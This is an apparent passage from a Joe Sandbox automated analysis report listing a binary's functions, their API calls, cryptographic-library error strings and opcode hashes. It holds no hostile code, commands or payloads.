                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                                          • String ID:
                                                                                                          • API String ID: 757764206-0
                                                                                                          • Opcode ID: b8408f6cf516a9fb5181c0e636ed846e5c1c72a8fb70f18eae89e6d8bd4b0e64
                                                                                                          • Instruction ID: a2caf39eee12251f3db4098a8bcf1ceeae45ed77b82ca2a9abd6a1eaa6c62d19
                                                                                                          • Opcode Fuzzy Hash: b8408f6cf516a9fb5181c0e636ed846e5c1c72a8fb70f18eae89e6d8bd4b0e64
                                                                                                          • Instruction Fuzzy Hash: E0312B71E00618EFCB10DF69CC80B9EB7BAAF95600F6045AAE419E7245D775E9808F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03FF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F046A08
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F046A15
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F046A41
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                                          • String ID:
                                                                                                          • API String ID: 757764206-0
                                                                                                          • Opcode ID: c6d879c57987caf736faa8f1fede89b00092cdcbc1a3741fdd4772d2911f4e70
                                                                                                          • Instruction ID: dd1355c9a8901621043dc30ef120f8147384980eb15d3229c415783012b240f4
                                                                                                          • Opcode Fuzzy Hash: c6d879c57987caf736faa8f1fede89b00092cdcbc1a3741fdd4772d2911f4e70
                                                                                                          • Instruction Fuzzy Hash: 3731F971F00618DFCB10DB69CD80B9DB7BAAF85310F60469AE519E7281CB75AD808F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03FD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F046A08
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F046A15
                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F046A41
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                                                                          • String ID:
                                                                                                          • API String ID: 757764206-0
                                                                                                          • Opcode ID: b8408f6cf516a9fb5181c0e636ed846e5c1c72a8fb70f18eae89e6d8bd4b0e64
                                                                                                          • Instruction ID: 07f3aaada84e232f58f63b4fc1bbc5ba96442b3ca18c3cfd5bf3ad978792ce99
                                                                                                          • Opcode Fuzzy Hash: b8408f6cf516a9fb5181c0e636ed846e5c1c72a8fb70f18eae89e6d8bd4b0e64
                                                                                                          • Instruction Fuzzy Hash: 3B312A71E00618EFCB10DF69CD80B9DB7BAAF85300F60459AE559E7242DB75ED808F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0806A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024760: __CxxThrowException@8.LIBCMT ref: 6F0247F9
                                                                                                          • _memmove.LIBCMT ref: 6F080907
                                                                                                          • _memmove.LIBCMT ref: 6F080936
                                                                                                          • _memmove.LIBCMT ref: 6F080959
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F080A25
                                                                                                          Strings
                                                                                                          • PSSR_MEM: message recovery disabled, xrefs: 6F0809E3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8Throw
                                                                                                          • String ID: PSSR_MEM: message recovery disabled
                                                                                                          • API String ID: 2655171816-3051149714
                                                                                                          • Opcode ID: 5a1bc5147427d1d7e8d7ec6629c9bcab65501a8d597fe602b4ca8c535367173e
                                                                                                          • Instruction ID: 7297035f4f20f819f6fe4b1a7b31ed05e31e19c927675b099e91b91aa205fd82
                                                                                                          • Opcode Fuzzy Hash: 5a1bc5147427d1d7e8d7ec6629c9bcab65501a8d597fe602b4ca8c535367173e
                                                                                                          • Instruction Fuzzy Hash: 00C178756093419FDB14CF28C980B6ABBE5BFC9304F048A1DE99987385DB34E945CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08BE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CreateFrameInfo.LIBCMT ref: 6F08BEB6
                                                                                                            • Part of subcall function 6F08AB70: __getptd.LIBCMT ref: 6F08AB7E
                                                                                                            • Part of subcall function 6F08AB70: __getptd.LIBCMT ref: 6F08AB8C
                                                                                                          • __getptd.LIBCMT ref: 6F08BEC0
                                                                                                            • Part of subcall function 6F08EAE6: __getptd_noexit.LIBCMT ref: 6F08EAE9
                                                                                                            • Part of subcall function 6F08EAE6: __amsg_exit.LIBCMT ref: 6F08EAF6
                                                                                                          • __getptd.LIBCMT ref: 6F08BECE
                                                                                                          • __getptd.LIBCMT ref: 6F08BEDC
                                                                                                          • __getptd.LIBCMT ref: 6F08BEE7
                                                                                                          • _CallCatchBlock2.LIBCMT ref: 6F08BF0D
                                                                                                            • Part of subcall function 6F08AC15: __CallSettingFrame@12.LIBCMT ref: 6F08AC61
                                                                                                            • Part of subcall function 6F08BFB4: __getptd.LIBCMT ref: 6F08BFC3
                                                                                                            • Part of subcall function 6F08BFB4: __getptd.LIBCMT ref: 6F08BFD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1602911419-0
                                                                                                          • Opcode ID: f55c10adec7bc8fddbda5820ddd67383c27c2281eb75ec233473e26fe5030702
                                                                                                          • Instruction ID: 5c356e7ad9acd4d64e305c3867537fdcc69c7ca196a2881afc5d67b8790bf8c4
                                                                                                          • Opcode Fuzzy Hash: f55c10adec7bc8fddbda5820ddd67383c27c2281eb75ec233473e26fe5030702
                                                                                                          • Instruction Fuzzy Hash: 1711C6B1D00309DFDF10DFA4D544B9EBBB5FF04318F10856AE824A7291EB38AA559F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0570E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F057267
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw
                                                                                                          • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                                                                                                          • API String ID: 2005118841-1273958906
                                                                                                          • Opcode ID: 3575cde37a1ff6c418991da47f042d01b7993d41d0801abb323ddccf2ff998f4
                                                                                                          • Instruction ID: 83e261ae540f15d70f776b68beddd15ec251944091c3babd3a2cdc81aa77eff5
                                                                                                          • Opcode Fuzzy Hash: 3575cde37a1ff6c418991da47f042d01b7993d41d0801abb323ddccf2ff998f4
                                                                                                          • Instruction Fuzzy Hash: 9A618575108381AFD321DB68C984FDFB7E8BF99308F004A1DE59D87291DB759904CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07AE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strncmptype_info::operator!=
                                                                                                          • String ID: ThisPointer:$ValueNames
                                                                                                          • API String ID: 1333309372-2375088429
                                                                                                          • Opcode ID: 54d330fe845cb2259c0039f520f71fb70d961d86f69633458588eaaf03eda36a
                                                                                                          • Instruction ID: 4a5ecc3d9f81783c43eb721535b587b1a50419e14484a90127e0f2c53d2ebcb5
                                                                                                          • Opcode Fuzzy Hash: 54d330fe845cb2259c0039f520f71fb70d961d86f69633458588eaaf03eda36a
                                                                                                          • Instruction Fuzzy Hash: 5B51D5B53087445BD324DFA4C890B27B7EBAF85348F144A9DF4A68B2A1DB23F809C755
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05A360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strncmptype_info::operator!=
                                                                                                          • String ID: ThisPointer:$ValueNames
                                                                                                          • API String ID: 1333309372-2375088429
                                                                                                          • Opcode ID: 98607b0f88a4733ca9c0afe33a16bd617c5f0d3f82cb1f5e9996dfc42792f09f
                                                                                                          • Instruction ID: c16910ac79bbed46e12af95537bc163d76e344b375fa5d75c22b0141618080a6
                                                                                                          • Opcode Fuzzy Hash: 98607b0f88a4733ca9c0afe33a16bd617c5f0d3f82cb1f5e9996dfc42792f09f
                                                                                                          • Instruction Fuzzy Hash: 5C51F5352083445BC7148FA4DA94B27B7EAAFC6348F144A5DF4DA8B282D7A6F8188761
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07B9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strncmptype_info::operator!=
                                                                                                          • String ID: ThisPointer:$ValueNames
                                                                                                          • API String ID: 1333309372-2375088429
                                                                                                          • Opcode ID: 8cb884a07b0cbf149663048592cf8704788991abb6ca6a5d9199118bb17e8ab2
                                                                                                          • Instruction ID: b47214f2223d8a71879666df4f256cd86f4ef1b22ab540069d780723c366e5c2
                                                                                                          • Opcode Fuzzy Hash: 8cb884a07b0cbf149663048592cf8704788991abb6ca6a5d9199118bb17e8ab2
                                                                                                          • Instruction Fuzzy Hash: F751E6B5208344ABC334DF74C890B67F7EAAF85218F044A9DF8D68B295DB62F809C755
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F061B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F061C1A
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F061CDE
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F061D3E
                                                                                                          Strings
                                                                                                          • TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6F061CF0
                                                                                                          • TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6F061C67
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                          • String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
                                                                                                          • API String ID: 3476068407-3371871069
                                                                                                          • Opcode ID: cac5a7f2a985b833e26df3dd76e42072b8a6b3baa5ba4e68a78c543585055c9c
                                                                                                          • Instruction ID: e4ff3c8e2bdd250b24c601ba393a391f0dcd3ea55ef788d45712a6a9d02f6dd8
                                                                                                          • Opcode Fuzzy Hash: cac5a7f2a985b833e26df3dd76e42072b8a6b3baa5ba4e68a78c543585055c9c
                                                                                                          • Instruction Fuzzy Hash: DA515675208740AFD724DF68C880F9BB7E9BFC8714F108A1DE59987391DB70A9058BA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F056B00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 161COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F056BA6
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F024067
                                                                                                            • Part of subcall function 6F024010: _memmove.LIBCMT ref: 6F0240C8
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F056C56
                                                                                                          Strings
                                                                                                          • NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6F056B33
                                                                                                          • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6F056BE3
                                                                                                          • Do, xrefs: 6F056CE6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                                          • String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented$Do
                                                                                                          • API String ID: 1902190269-575003105
                                                                                                          • Opcode ID: 8e4e4a88d2a36b440b0195736730a79a32cfa5fefaf51ca348c7e58c6574cdb6
                                                                                                          • Instruction ID: cbd092ecffa7229bd50012a3b376774b5edccf369c3f0593c9c3a094b6b8c839
                                                                                                          • Opcode Fuzzy Hash: 8e4e4a88d2a36b440b0195736730a79a32cfa5fefaf51ca348c7e58c6574cdb6
                                                                                                          • Instruction Fuzzy Hash: 9851587510C380AFC310CF68C980B5BFBE8BB99758F504A1EF4A983291DBB5D908CB52
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F024010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                            • Part of subcall function 6F089125: std::exception::exception.LIBCMT ref: 6F08913A
                                                                                                            • Part of subcall function 6F089125: __CxxThrowException@8.LIBCMT ref: 6F08914F
                                                                                                            • Part of subcall function 6F089125: std::exception::exception.LIBCMT ref: 6F089160
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F024067
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
